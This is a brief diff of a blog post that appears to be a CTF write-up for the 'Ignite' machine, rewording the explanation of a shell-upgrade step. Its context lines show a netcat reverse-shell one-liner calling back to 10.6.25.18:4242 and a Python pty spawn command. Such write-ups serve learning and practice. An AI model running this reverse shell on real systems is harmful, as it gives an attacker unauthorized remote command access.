nicoleman0/security.github.io/_posts/2025-04-12-Ignite-CTF.md

 `rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.6.25.18 4242 > /tmp/f`

-This spawns a terminal so that I can login to root:
+This spawns a terminal so that I can login to root.
+It is available because Python is enabled.

 `python -c 'import pty; pty.spawn("/bin/sh")'`